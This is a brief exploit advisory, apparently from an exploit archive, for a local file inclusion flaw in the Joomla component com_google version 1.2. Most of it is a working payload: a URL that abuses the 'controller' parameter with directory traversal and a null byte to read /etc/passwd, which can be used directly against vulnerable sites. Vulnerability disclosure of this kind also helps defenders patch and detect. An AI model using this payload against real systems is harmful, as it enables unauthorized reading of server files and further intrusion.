id: 11870
date: 04/18/2010
title: Joomla Component com_google Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

==============================================================
Joomla Component com_google Local File Inclusion Vulnerability
==============================================================

============================================================================================================
 
 
  [o] Joomla Component Contact Us Google Map Local File Inclusion Vulnerability
  
       Software : com_google version 1.2
       Vendor   : http://joomlacomponent.inetlanka.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_google&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_google&controller=../../../../../../../../../../etc/passwd%00
 
 
============================================================================================================



#  0day.today [2023-03-22]  #